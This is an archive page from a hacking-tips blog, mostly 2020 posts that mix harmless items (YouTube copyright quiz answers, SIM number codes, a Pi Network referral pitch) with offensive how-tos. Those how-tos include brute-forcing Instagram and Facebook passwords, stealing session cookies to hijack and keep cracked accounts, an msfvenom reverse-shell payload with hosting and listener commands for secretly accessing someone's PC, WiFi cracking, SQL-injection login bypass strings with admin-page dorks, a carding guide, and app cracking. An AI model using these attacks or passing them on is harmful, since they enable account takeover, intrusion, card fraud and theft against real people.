Posts

Showing posts from 2020

YouTube Copyright School Questions And Answers 2020

All Questions With Answers (1 Qu) The Following Things Are Copyrightable Names Place Faces and space (1 Ans) False (2 Qu) The Following Item Is Protected By Copyright (2 Ans) Your Orignal Youtube Video (3 Qu) If you claim fair use in the video description, your video can’t be considered copyright infringement (3 Ans) False (4 Qu) All uses of copyrighted content without permission of the owner are considered copyright infringement (4 Ans) False (5 Que) If someone alleges that you have infringed their copyright, you will receive a notification (5 Ans) Both A&B (6 Qu) If you misuse YouTube’s counter-notification process (6 Ans) Your YouTube account will be terminated (7 Que) Its fine to use someone else’s content as long as it already appears on YouTube (7 An) False (8 Qu) It’s possible for music to have more than one copyright owner (8 Ans) True (9 Qu) If a video gets removed because of a copyright infringement notification, filing a counter-notification is the only possible way to...

Earn money for free

Hello friends , I guess you all have heard about bitcoin but do you all know there is one more upcoming cryptocurrency The name is " pi network " . And the good news is It's a new crypto but it's verified . That's means it's value will rise very soon. So hurry up !!! You can mine pi coins in your mobile itself . All u gotta do is go to the app once every 24hrs Just go this link : https://minepi.com/santoshbharati3 Download and Sign up and when it asks for invite code Use this code : santoshbharati3 (tap to copy) ( Using invite code is mandatory ) If you have any doubts regarding this comment below

HOW TO INSTALL BACKTRACK AND HACK WI-FI ON ANDROID

Ⓜ️ ʀᴇϙᴜɪʀᴇᴍᴇɴᴛs Ⓜ️ 1. ʀᴏᴏᴛᴇᴅ ᴀɴᴅʀᴏɪᴅ ᴅᴇᴠɪᴄᴇ  ʀᴏᴏᴛ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ 2. ᴅᴏᴡɴʟᴏᴀᴅ ʙᴀᴄᴋᴛʀᴀᴄᴋ ᴀʀᴍ 3. ᴅᴏᴡɴʟᴏᴀᴅ ʙᴜsʏʙᴏx 4. ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅʀᴏɪᴅ ᴠɴᴄ 5. ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅʀᴏɪᴅ ᴛᴇʀᴍɪɴᴀʟ 6. ɪғ ʏᴏᴜ ᴀʀᴇ ᴜsɪɴɢ ᴘᴄ ᴛʜᴇɴ ʏᴏᴜ ɴᴇᴇᴅ 7ᴢɪᴘ ғᴏʀ ᴇxᴛʀᴀᴄᴛɪᴏɴ ᴏᴛʜᴇʀᴡɪsᴇ ʏᴏᴜ ᴄᴀɴ ᴜsᴇ ᴅᴏᴡɴʟᴏᴀᴅ ᴢᴀʀᴀᴄʜɪᴇᴠᴇʀ ᴏɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ᴘʜᴏɴᴇ. ✅ sᴛᴇᴘs ᴛᴏ ɪɴsᴛᴀʟʟ ʙᴀᴄᴋᴛʀᴀᴄᴋ & ʜᴀᴄᴋ ᴡɪғɪ ᴏɴ ᴀɴᴅʀᴏɪᴅ 🌀ғɪʀsᴛ, ᴇxᴛʀᴀᴄᴛ ᴛʜᴇ ʙᴛ5-ɢɴᴏᴍᴇ-ᴀʀᴍ.7ᴢ. ᴀɴᴅ ᴄᴏᴘʏ ʙᴛ5 ғᴏʟᴅᴇʀ ᴀɴᴅ ᴛʜᴇɴ ᴘᴜᴛ ɪɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ʀᴏᴏᴛ ᴅɪʀᴇᴄᴛᴏʀʏ. ғᴏʀ ᴇxᴀᴍᴘʟᴇ- ᴍʏ ᴘʜᴏɴᴇs ʀᴏᴏᴛ ᴅɪʀᴇᴄᴛᴏʀʏ ɪs /sᴅ ᴄᴀʀᴅ. (ᴀs ᴅɪғғᴇʀᴇɴᴛ ᴀɴᴅʀᴏɪᴅs ᴡɪʟʟ ʜᴀᴠᴇ ᴅɪғғᴇʀᴇɴᴛ ʀᴏᴏᴛ ᴅɪʀᴇᴄᴛᴏʀɪᴇs). ɪɴsᴛᴀʟʟ ᴀʟʟ ᴀᴘᴘs ᴛʜᴀᴛ ɢɪᴠᴇɴ ɪɴ ʀᴇϙᴜɪʀᴇᴍᴇɴᴛs. ⚜️ᴀғᴛᴇʀ ɪɴsᴛᴀʟʟɪɴɢ ʙᴜsʏʙᴏx ᴀᴘᴘʟɪᴄᴀᴛɪᴏɴ ᴏᴘᴇɴ ɪᴛ ᴀɴᴅ ᴡᴀɪᴛ ᴜɴᴛɪʟ ɪᴛ ғɪɴɪsʜᴇs ʟᴏᴀᴅɪɴɢ ᴀɴᴅ ᴛʜᴇɴ ᴄʟɪᴄᴋ ᴏɴ sᴍᴀʀᴛ ɪɴsᴛᴀʟʟ ʙᴜᴛᴛᴏɴ ᴏғ ᴛʜᴇ ᴀᴘᴘʟɪᴄᴀᴛɪᴏɴ. ⚜️ɪɴ ʏᴏᴜʀ, ᴀɴᴅʀᴏɪᴅ ᴏᴘᴇɴ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ᴀᴘᴘ ᴀɴᴅ ᴛʜᴇɴ ᴇxᴇᴄᴜᴛᴇ ᴛʜᴇ ɢɪᴠᴇɴ ᴄᴏᴍᴍᴀɴᴅs. sᴜ ᴄᴅ /sᴅᴄᴀʀᴅ/ʙᴛ5sʜ ʙᴏᴏᴛʙᴛ ᴡʜᴇɴ sᴜ ᴄᴏᴍᴍᴀɴᴅs ᴇxᴇᴄᴜᴛᴇᴅ ɪᴛ ᴡɪʟʟ ᴀsᴋ ғᴏʀ sᴜᴘᴇʀ ᴜsᴇʀ ᴀᴄᴄᴇss ʏᴏᴜ ʜᴀᴠᴇ ᴛᴏ ᴄʟɪᴄᴋ ᴏɴ ɢʀᴀɴᴛ ᴏɴ ᴛʜᴇ ᴘʀᴏᴍᴘᴛ ᴀᴘᴘᴇᴀʀ. ɴᴏᴡ ᴀғᴛᴇʀ ᴛʜɪs ᴛʏᴘᴇ ᴛʜᴇ ᴄᴏᴍᴍᴀɴᴅs: ᴇxᴘᴏ...

Get Unlimited Google Drive

🔰Unlimited Google Drive Method 🔰 🌀 Steps 1. Go to this website: https://teamdrive.mfoxx.workers.dev 2. Choose a name for your drive and enter your gmail address 3. Click submit 4. Enjoy 🌀If it does not show up instantly just wait until it shows up. 🌀It usually takes about 5 min max.

How To Remotely Turn Off Any Android Phone With SMS or Call [Like a Hacker]

🔘 Using Remote Power Off            The method is very straightforward and requires just 3-4 minutes to set up on your android device. After installing you can turn off your Android device remotely. Follow, some of the simple steps given below to remotely turn off any Android with SMS or call. 🔹 Step 1: First of all, you need a rooted android. 🔹 Step 2: Now download Remote Power Off zip file in your computer and extracts it in the computer. On the extracted folder,  navigate System>App> Remoteturnoff.apk, then transfer the apk file in your android. 🔹 Step 3: Now install the app on your android device. 🔹 Step 4: Now you will type the current password that is null and then type the new password and confirm it again and click on change secret code. 🔹 Step 6: Now you will be asked to grant the superuser permissions. Simply grant permission to reach the next page. ✅ That’s it! you are done, now you just need to send the secre...

HOW TO CRACK ANY ANDROID APP,GAME OR ANYTHING BEEN IT A THIRD PARTY APP?

Wʜᴀᴛ ɪs ʟᴜᴄᴋʏ Pᴀᴛᴄʜᴇʀ? Lᴜᴄᴋʏ Pᴀᴛᴄʜᴇʀ ɪs ᴀ ᴠᴇʀʏ ᴄᴏᴏʟ ᴀᴘᴘ ᴛʜᴀᴛ ʜᴀs ᴛʜᴇ ᴄᴀᴘᴀʙɪʟɪᴛʏ ᴏғ ᴘᴀᴛᴄʜɪɴɢ ᴀʟʟ ᴏᴛʜᴇʀ ᴀᴘᴘs ɪɴsᴛᴀʟʟᴇᴅ ᴏɴ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ ᴀɴᴅ ᴄᴀɴ ᴍᴏᴅɪғʏ ᴛʜᴇᴍ ᴀᴄᴄᴏʀᴅɪɴɢ ᴛᴏ ʏᴏᴜʀ ᴡɪsʜ. Wɪᴛʜ ᴛʜᴇsᴇ ᴀᴘᴘs, ʏᴏᴜ ᴡɪʟʟ ʙᴇ ᴀʙʟᴇ ᴛᴏ ʜᴀᴄᴋ ᴀɴʏ ᴏғ ʏᴏᴜʀ ғᴀᴠᴏʀɪᴛᴇ ɢᴀᴍᴇ ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ʀᴇᴄʜᴀʀɢɪɴɢ ᴀᴘᴘ ᴛᴏ ɢᴇᴛ ᴛʜᴇ ғʀᴇᴇ ʙᴏɴᴜs. Tʜᴇʀᴇ ᴀʀᴇ ᴛᴡᴏ ᴡᴀʏs ᴏғ ᴅᴏɪɴɢ ᴛʜɪs ᴘʀᴏᴄᴇss 1. Bʏ ʀᴏᴏᴛɪɴɢ 2. Nᴏɴ-Rᴏᴏᴛɪɴɢ ➖ BY ROOTING: Mᴇᴛʜᴏᴅ 1: 1)Lᴜɴᴄʜ Lᴜᴄᴋʏ ᴘᴀᴛᴄʜᴇʀ ᴀᴘᴋ ᴀɴᴅ ɢʀᴀɴᴛ ʀᴏᴏᴛ ᴀᴄᴄᴇss. 2)Yᴏᴜ ᴍᴀʏ ᴍɪɴɪᴍɪᴢᴇ ᴏʀ ᴄʟᴏsᴇ Lᴜᴄᴋʏ ᴘᴀᴛᴄʜᴇʀ ᴀᴛ ᴛʜɪs ᴍᴏᴍᴇɴᴛ ᴀɴᴅ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴀᴘᴘ ᴡʜɪᴄʜ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ɢᴇᴛ ᴛʜᴇ Pʀᴏ ᴠɪsɪᴏɴ ᴏʀ ᴛʜᴇ ᴘᴀɪᴅ ᴠɪsɪᴏɴ. 3)Gᴏ ᴛᴏ ᴘᴜʀᴄʜᴀsᴇ sᴇᴄᴛɪᴏɴ ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ ʙᴜʏ ᴏʀ ᴘʀᴏ ᴠɪsɪᴏɴ ᴏʀ ᴀɴʏᴛʜɪɴɢ ᴛʜᴀᴛ ɪs ᴡʀɪᴛᴛᴇɴ ɪɴ ʏᴏᴜʀ ᴀᴘᴘ. 4)Nᴏᴡ ᴛʜᴇ Lᴜᴄᴋʏ ᴘᴀᴛᴄʜᴇʀ's ᴡɪɴᴅᴏᴡ ᴏᴘᴇɴs ɪᴛsᴇʟғ ɪɴsᴛᴇᴀᴅ ᴏғ ɢᴏᴏɢʟᴇ ɪɴ ᴀᴘᴘ ᴘᴜʀᴄʜᴀsᴇ ʙᴏx. Iɴ ᴛʜᴀᴛ ᴡɪɴᴅᴏᴡ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ "Dᴏ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ᴛʀʏ ᴛᴏ ɢᴇᴛ ᴛʜɪs ᴀᴘᴘ ғᴏʀ ғʀᴇᴇ" ᴀs sʜᴏᴡɴ ɪɴ sᴄʀᴇᴇɴ sʜᴏᴛs ʙᴇʟᴏᴡ ᴀɴᴅ Sᴇʟᴇᴄᴛ "ʏᴇs". Nᴏɴ-ʀᴏᴏᴛᴇᴅ ᴜsᴇʀ Cʟɪᴄᴋ ᴏɴ "sᴇɴᴅ ʀᴇᴘʟʏ ᴛᴏ ᴀᴘᴘʟɪᴄᴀᴛɪᴏɴ(Uɴsɪɢɴᴇᴅ). 5)Dᴏɴᴇ. Nᴏᴡ ʏᴏᴜ ʜᴀᴄᴋᴇᴅ ᴛʜᴇ Iɴ ᴀᴘᴘ...

ATTACK on Instagram By BruteForce

In this blog, we will use a script called instashell A Powerful script that can do Brutus Force attacks on Instagram. This script can bypass login restrictions and test an unlimited number of passwords at very high speeds on a Target account. Crack instruction with instashell Crack account can be run with all Linux operating systems :))) First, we download the relevant tool from Git Hub with the following command. git clone https://github.com/thelinuxchoice/instashell.git Then we enter the following commands to enter the download folder and activate the necessary permissions for the tool. cd instashellchmod + x install.sh./install.shchmod + x instashell.sh./instashell.sh Next, we enter the Target username and password of our list, respectively, and adjust the number of crumbs based on our internet speed. This tool can test an unlimited number of passwords without blocking your IP, and if your Target password is inside your password list, it will find it for you. Well, you have to be a ...

Hack Facebook Account Password Using Brute Force

Hack Facebook Account Password Using Brute Force 1️⃣. First lets know something about Brute force attacks, “A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). 2️⃣. In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.” But, In our case I’ll be using a Python script and a Long Dictionary Of passwords. Requirement A Kali Machine / Or Any Python Engine Will work! Facebook.py ( v1 or v2 ) A FaceBook id CrackStation Word List! To get this pm wit cash 📍STEPS📍 Step 1. Install Python-mechanize using command mention below ~#apt-get install python-mechanize Step 2. Add facebook.py using the command below ~# chmod +x facebook.py [*] ~# python facebook.py Step 3. Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,            ...

HOW TO WATCH NETFLIX CONTENT FOR FREE ON ANDROID 2020

Info:  we are going to share a new method that would help you watch Netflix content for free. ✍️Step 1. First of all, head to the Google Play Store and install the ‘Watched’ app. ✍️Step 2. Once done, launch the app from your Android’s app drawer. ✍️Step 3. Now you need to tap on the (+) button, as shown in the screenshot below. ✍️Step 4. Next, under the bundle, enter ‘huhu.to‘ and then tap on the ‘Continue’ button. ✍️Step 5. Now, wait for a few seconds until the app grabs the media content. ✍️Step 6. Once done, you will be able to see all Netflix content. ✍️Step 7. Select the video and stream the video by selecting the servers. That’s it! You are done. This is how you can watch Netflix content for free on Android in 2020.

HOW TO KEEP THE CRACKED ACCOUNT WITH YOU AFTER THE OWNER CHANGES THE PASSWORD?

TO DO THIS, YOU HAVE TO DO FOLLOWING STEPS WHEN YOU GET THE ACCOUNT~ Step 1 - Log in to the cracked account Step 2 - Download Cookies Editor extension for Chrome Step 3 - Go to the homepage of the cracked account website Step 4 - Click on the extension at the top of the search bar on the right Step 5 - Click on export Step 6 - Paste the cookies in a txt file   WHEN THE OWNER OF ACCOUNT CHANGED THE PASSWORD   Step 1 - Copy the cookies from your txt files Step 2 - Click on the extension at the top of the search bar on the right Step 3 - Click on import Step 4 - Past your cookies and click Done Step 5 - Refresh

Hack phone on the Emergency.

Image
Hack phone on the Emergency. Lockscreen hack exposes Android smartphones to full control by hackers A critical bug allows hackers to gain access to Android smartphones/tablets. This Android smartphone hack affects all devices running versions of Android 5.x which means that a millions of Android smartphones in circulation worldwide are susceptible. The process of attack : 1⃣From the locked screen, open the EMERGENCY CALL window. 2⃣ Type a few characters, e.g. 10 asterisks. Double-tap the characters to highlight them and tap the copy button. Then tap once in the field and tap paste, doubling the characters in the field. Repeat this process of highlight all, copy, and paste until the field is so long that double-tapping no longer highlights the field. This usually occurs after 11 or so repetitions. 3⃣. Go back to the lockscreen, then swipe left to open the camera. Swipe to pull the notification drawer down from the top of the screen, then tap the Settings (gear) icon in the top right. Th...

How To Remove Pattern On Android Without Factory Reseting

Image
Unlock Locked Pattern Without Losing Data! Requirements: Aroma File Manager +A memory card for device. +Your android device must be either locked by pattern lock or password lock. How To Do it (Procedure) ❓ 1. After you download “Aroma File Manager” place it in your card [SD CARD] Insert card into your locked android device. 2. Open Stock Recovery Mode by rebooting your android device and pressing PowerKey and VolumeUp key simultaneously. Different phones may have different methods to open stock recovery mode, so if you face any problems comment and i will give you the solution. 3. After entering into recovery mode use volume+ and volume- buttons to scroll up and down.For select use power button or home button. 4. From there click on “Install zip from SD Card” and navigate to where you placed “Aroma File Manager” click and install it. 5. After installing, it will open in recovery mode. 6. From the “Aroma File Manager” navigate to settings>>go to bottom and click on “Automount All...

Carding || (Full Course)

Image
Carding: I understand the fact that many people are ready to learn, but the available resource for them is the internet, but many of them get scammed and ripped in the journey, that’s why I have decided to drop The Definitive New(2020) Latest Carding Tutorial Guide. Carding is not something easy i must confess, you really need to devote your time to get success, So If you follow this tutorial carefully, I guarantee you that within a week of real practicing, you should be a pro carder. What is Carding? Carding is term described as a trick whereby products are being shopped/ordered from any online shops e.g Amazon, Jumia, FlipKart using Fake Cards(Credit/Debit). Who is a Carder ? A carder is referred to as a man who make uses of Hacked credit card details or buys credit cards from Credit card shops, or even pick up Credit Cards from Dumps Via Dark Web for the purpose of carding online shops. What You Will Need To Start Carding 1.Computer or Laptop 2.Socks (Compulsory, But some people do ...

HOW TO GAIN ACCESS TO SOMEONE'S PC OR LAPTOP WITHOUT HIM/HER EVEN KNOWING...

Image
HOW TO GAIN ACCESS TO SOMEONE'S PC OR LAPTOP WITHOUT HIM/HER EVEN KNOWING... STEP-BY-STEP GUIDE Note: this is for educational purpose only. Gaining access to someone PC wither there permission is a crime. You will be responsible for anything you do illegally. For this method we will use Metasploit to create payload. I will show you how to attack windows through kali. Just by changing commands you can hack linux also. Step by step guide:- Open Metasploit Framework in kali. Now type msfvenom -p Windows/meterpreter/reverse_tcp lhost=(your ip address in kali) lport=1234 –format=exe > payload.exe Hit enter and let the payload generate. Here we will use apache web server to host payload and generate link. cp payload.exe /var/www/html/ (this is where you host your website or phishing page) service postgresql start service apache2 start msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost (your ip in kali) set lport 1234 exploit –j –z Show your crea...

HOW TO UNBLOCK YOURSELF ON WHATSAPP

Image
HOW TO UNBLOCK YOURSELF ON WHATSAPP IF SOMEONE BLOCKS YOU Step 1: Write down your blocker’s phone number If you have the contact that blocked you saved on your phone, write it down somewhere and delete it from your phone. Step 2: Back up your chats I believe you already know how to back up your WhatsApp chat (both messages and media files). Well, if you don’t then here is a quick guide to creating a Google Drive backup: Open WhatsApp. Go to Menu Button > Settings > Chats > Chat backup.  Tap Back up to Google Drive and set up the backup frequency to your liking.  You will be prompted to select a Google account that you will back up your chat history to. If you do not have a Google account, tap Add account when prompted. Please remember the Google account you are using for the backup.  Tap Back up over to choose the network you wish to use for backup. Please note that backing up over cellular may result in additional data charges. Step 3: Delete your WhatsApp accou...

Hack Wifi In 15 Mintues‼️

Image
‼️Hack Wifi In 15 Mintues‼️ Go. 1. Download kali linux - https://www.kali.org/downloads/ 1.1 Install Kali Linux on a USB flash drive or virtual machine 1.3 Run from a USB flash drive or virtual machine under Kali 2. Open the console 2.1 We write: iwconfig and check if our LAN card! If you have problems at this moment (this will not happen with laptops), then you need to buy this card. For 300 rubles you can take a usb tplink card with alik and everything will be in chocolate. 2.2 Now we turn on the monitoring mode: airmon-ng start wlan0 (vlan0 is the value from the parameters of the network card, you may have a slightly different one, for example mon0) 2.3 Now you need to scan: airodump-ng wlan0 2.4 Here we will see a list of Wi-Fi networks within the radius of our device, it depends on the network card. Here we need to select the target of the attack, we choose according to your taste, I usually take the one who has the best signal (The signal level is determined by the abbreviation p...

HOW TO CRACK ANY ANDROID APP,GAME OR ANYTHING BEEN IT A THIRD PARTY APP

Image
🛠📱 HOW TO CRACK ANY ANDROID APP,GAME OR ANYTHING BEEN IT A THIRD PARTY APP 📱🛠 ------------------------------------------- 🔺Wʜᴀᴛ ɪs ʟᴜᴄᴋʏ Pᴀᴛᴄʜᴇʀ? Lᴜᴄᴋʏ Pᴀᴛᴄʜᴇʀ ɪs ᴀ ᴠᴇʀʏ ᴄᴏᴏʟ ᴀᴘᴘ ᴛʜᴀᴛ ʜᴀs ᴛʜᴇ ᴄᴀᴘᴀʙɪʟɪᴛʏ ᴏғ ᴘᴀᴛᴄʜɪɴɢ ᴀʟʟ ᴏᴛʜᴇʀ ᴀᴘᴘs ɪɴsᴛᴀʟʟᴇᴅ ᴏɴ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ ᴀɴᴅ ᴄᴀɴ ᴍᴏᴅɪғʏ ᴛʜᴇᴍ ᴀᴄᴄᴏʀᴅɪɴɢ ᴛᴏ ʏᴏᴜʀ ᴡɪsʜ. Wɪᴛʜ ᴛʜᴇsᴇ ᴀᴘᴘs, ʏᴏᴜ ᴡɪʟʟ ʙᴇ ᴀʙʟᴇ ᴛᴏ ʜᴀᴄᴋ ᴀɴʏ ᴏғ ʏᴏᴜʀ ғᴀᴠᴏʀɪᴛᴇ ɢᴀᴍᴇ ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ʀᴇᴄʜᴀʀɢɪɴɢ ᴀᴘᴘ ᴛᴏ ɢᴇᴛ ᴛʜᴇ ғʀᴇᴇ ʙᴏɴᴜs. Tʜᴇʀᴇ ᴀʀᴇ ᴛᴡᴏ ᴡᴀʏs ᴏғ ᴅᴏɪɴɢ ᴛʜɪs ᴘʀᴏᴄᴇss 1. Bʏ ʀᴏᴏᴛɪɴɢ 2. Nᴏɴ-Rᴏᴏᴛɪɴɢ ➖ BY ROOTING: Mᴇᴛʜᴏᴅ 1: 1)Lᴜɴᴄʜ Lᴜᴄᴋʏ ᴘᴀᴛᴄʜᴇʀ ᴀᴘᴋ ᴀɴᴅ ɢʀᴀɴᴛ ʀᴏᴏᴛ ᴀᴄᴄᴇss. 2)Yᴏᴜ ᴍᴀʏ ᴍɪɴɪᴍɪᴢᴇ ᴏʀ ᴄʟᴏsᴇ Lᴜᴄᴋʏ ᴘᴀᴛᴄʜᴇʀ ᴀᴛ ᴛʜɪs ᴍᴏᴍᴇɴᴛ ᴀɴᴅ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴀᴘᴘ ᴡʜɪᴄʜ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ɢᴇᴛ ᴛʜᴇ Pʀᴏ ᴠɪsɪᴏɴ ᴏʀ ᴛʜᴇ ᴘᴀɪᴅ ᴠɪsɪᴏɴ. 3)Gᴏ ᴛᴏ ᴘᴜʀᴄʜᴀsᴇ sᴇᴄᴛɪᴏɴ ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ ʙᴜʏ ᴏʀ ᴘʀᴏ ᴠɪsɪᴏɴ ᴏʀ ᴀɴʏᴛʜɪɴɢ ᴛʜᴀᴛ ɪs ᴡʀɪᴛᴛᴇɴ ɪɴ ʏᴏᴜʀ ᴀᴘᴘ. 4)Nᴏᴡ ᴛʜᴇ Lᴜᴄᴋʏ ᴘᴀᴛᴄʜᴇʀ's ᴡɪɴᴅᴏᴡ ᴏᴘᴇɴs ɪᴛsᴇʟғ ɪɴsᴛᴇᴀᴅ ᴏғ ɢᴏᴏɢʟᴇ ɪɴ ᴀᴘᴘ ᴘᴜʀᴄʜᴀsᴇ ʙᴏx. Iɴ ᴛʜᴀᴛ ᴡɪɴᴅᴏᴡ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ "Dᴏ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ᴛʀʏ ᴛᴏ ɢᴇᴛ ᴛʜɪs ᴀᴘᴘ ғᴏʀ ғʀᴇᴇ" ᴀs sʜᴏᴡɴ ɪɴ sᴄʀᴇᴇɴ sʜᴏᴛs ʙᴇʟᴏᴡ ᴀ...

Best book to learn hacking

Image
     💻 Best books for hacking!! 📲 Here are the list of book which is known as the best book to learn hacking.So, If you want to learn hacking please visit these url and search suitable book for you. 1. hacking How to Hack Computers, Basic Security and Penetration Testing Ebook Download Link : https://drive.google.com/file/d/0B4CdA3JV_23OSW5BTVlNU1RlaW8/view 2. Master the Kali Linux - From Noob to Expert Hacking - 8 Ebooks Download Link : http://www.mediafire.com/file/wv4sun24cwoow17/Kali+tutorial.rar 3. Grey Hat Hacking - The Ethical Hacker's Handbook Ebook Download Link : https://drive.google.com/file/d/0Bw1xURlCeiXiQXphUzlLTV8xWmM/view 4. Hacking The Art of Exploitation Ebook Download Link : http://www.mediafire.com/file/ht5dy5dwmf4h0j7/hacking-the-art-of-exploitation.pdf 5. The Hacker's Underground Hand Book. Download Link : http://www.mediafire.com/file/kb94m3pa9zahrv9/The-Hackers-Underground-Handbook.pdf                ...

How to do carding?

Image

Activate Windows 10 For Free

Image

Hack Android In Simple Step.

Image

See Sent Friend Request In Facebook

Image
Facebook is very popular social media among us.In this 21st  century, Everyone is familier with the term facebook and most of us know how to operate it well.In this blog. We are going to learn how to see sent friend request in facebook. To see sent friend request. First of all, login in your facebook and click on this link https://www.facebook.com/friends/requests/?fcref=none&outgoing=1 After clicking on this link,You will be redirect to the page where you will see the list of the people who don't have responded to your request yet. Next process : If the above method don't work on you,Then you can follow the picture given bellow in the numberic order. Hope after reading this blog,You can see the friend request which you have sent but not responded yet and you can also cancel the request if you wish to cancel in same page individually.       Thank You.Have a good day

Join and Earn from Pi Network

Image
1. के हो Pi Network भनेको ? यो आगामी 2021 March देखी आउन लागेको Pi डिजिटल पैसा अर्थात क्रिप्टोकरेन्सी सञ्चालनमा ल्याउने प्रोजेक्ट हो, जसको अहिले दोस्रो चरण चलिरहेको छ । यो हाम्रो हातमा रहेको मोबाईल बाटै कमाउन (Mining) सकिने पहिलो क्रिप्टोकरेन्सी हो । यो स्टान्फोर्ड युनिभर्सिटीका 3 जना PhD होल्डर क्रिप्टोकरेन्सी प्रोफेसरहरुको योजनामा सुरु भएको प्रोजेक्ट हो । यसमा अहिले लगभग 40 लाख मनिसहरु जोडीएका छन । 2. लगानी कति लाग्छ ? Pi Network बिल्कुलै नि:शुल्क हो र यसको App एन्ड्रोइडको Play Store र Apple को App Store बाट Install गरेर चलाऊन सकिन्छ । यसमा आफुले जत्ती कमाइ गरिन्छ सबै आफ्नै हो । 3. कसरी सुरु गर्ने ? यो Install गरिसके पछि आफ्नो फोन नं. वा फेसबुकको माध्यमबाट रेजिस्टर गर्नुहोस् । रेजिस्टर गर्दा आफ्नो नागरिकताको नाम राख्नु भएमा भविश्यमा KYC भर्दा सजिलो हुनेछ । यो प्रोजेक्ट जेन्युइन भएकोले बैंकहरुले जस्तै KYC गराउने छ । you can also download from browser using link: https://minepi.com/santoshbharati3 4. के हो Invitation Code ? यो Network मा सबै जना एक अर्कामा जोडीनु पर्ने भएकोले कोही नयाँ...

HACK FACEBOOK BY COOKIE STEALING

Image
HACK FACEBOOK BY COOKIE STEALING Facebook Authentication Cookies The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of  your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain  access to your account. This is how a facebook authentication cookie looks like: Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; How To Steal Facebook Session Cookies And Hijack An Account? An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon  the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet  sniffer and gain access to victims account. If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication  cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in...

Hack Website with sqlmap

Image
Hack Website With "inurl adminlogin.asp" String First of all goto google.com and search any one of the below dork in google and open that link.... inurl:adminlogin.asp inurl:admin_login.asp inurl:adminlogon.asp inurl:admin_logon.asp inurl:\\admin/admin_login.php inurl:/admin.asp inurl:/login.asp inurl:/logon.asp inurl:/adminlogin.asp inurl:/adminlogon.asp inurl:/admin_login.asp inurl:/admin_logon.asp inurl:/admin/admin.asp inurl:/admin/login.asp inurl:/admin/logon.asp inurl:/admin/adminlogin.asp inurl:/admin/adminlogon.asp inurl:/admin/admin_login.asp inurl:/admin/admin_logon.asp inurl:/administrator/admin.asp inurl:/administrator/login.asp inurl:/administrator/logon.asp inurl:root/login.asp inurl:admin/index.asp Click On Search Button. Then click on website URL. when its open there will be space for entering USER NAME OR PASWORD then in USERNAME box enter or Type Admin and in PASSWORD Type any one of the below code : admin'-- 1'or'1'='1 ...

Phishing

Image
According to the cyber security export , Phishing can be defined as the "Phishing is a cyber crime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords. Phishing is a tool used to grab others personal information,important data and credential to harm or take advantage. The term " phishing " is said to have been coined by the well known spammer and hacker in the mid-90s, Khan C Smith. The term “ phishing ” came about in the mid-1990s, when hackers began using fraudulent emails to “fish for” information from unsuspecting users.

How to block internet to other in wifi?

Image
To block Internet to the user in Wifi through mac, you have to follow these steps properly. First you should type I.P address of the router (default:192.168.1.254) and login with the credential given in the back side of router). Your login panel looks as below: Admin login panel If you don't know the credential then you can try: Username as: AdminGPON password as: ALC#FGU After you login into you router,you will see the page as below: Then you should click on the home networking and scroll down up to local network to know who are connected to your WiFi network then copy hardware address(mac address) of the user who you want to block Then again look and click at the security and click on MAC filter Here, you should enable the MAC filter. In MAC Filter Mode you will see default as allow, you should click over there and select blocked and add or paste the mac address you copied  and click on add. Then the mac will be blocked and will will see the list below of the mac you blocked. Not...

How to jailbreak iphone to bypass Icloud activation lock or for other reasons

Image
To jailbreak your apple phone for bypass Icloud activation lock or for other reasons. You have to follow some of the step.  First you have to download and install checkra1n from the the official website:( https://checkra.in/releases/ ). Note: You should download checkra1n for your own platform (like:Mac O.S ,  kali linux, Ubuntu e.t.c). It's only work for iOS 12.3 to 13.4.1 Open checkra1n (For linux O.S :  Go inside the file where it is located then type command: sudo checkra1n and it will be opened.) After the successfully open of checkra1n. Connect your Iphone to the computer which you want to jailbreak .Then, This will be shown tap to start and get started then tap to next and your phone will enter in the recovery mode and again tap to next Tap to start and then follow the every instruction given over there If you follow the given instruction properly then you phone will enter in to the DFU mode and start jailbreaking your phone and  PC  you will be s...

How to know own number in NTC, Ncell and Smart Cell

Image
To  see own phone number in ncell: First, you got to dail Then, type *903# and call Then your phone number will be shown To see own number in Namaste: First, you got to dail Then, type *9# and call Then your phone number will be show Note:  It is only valid for GSM numbers. There is no such method in CDMA .  To see own phone number in Smart Cell:  First, you got to dail Then, type *134# and call Then your phone number will be shown   Note: You should dail with same Sim Card.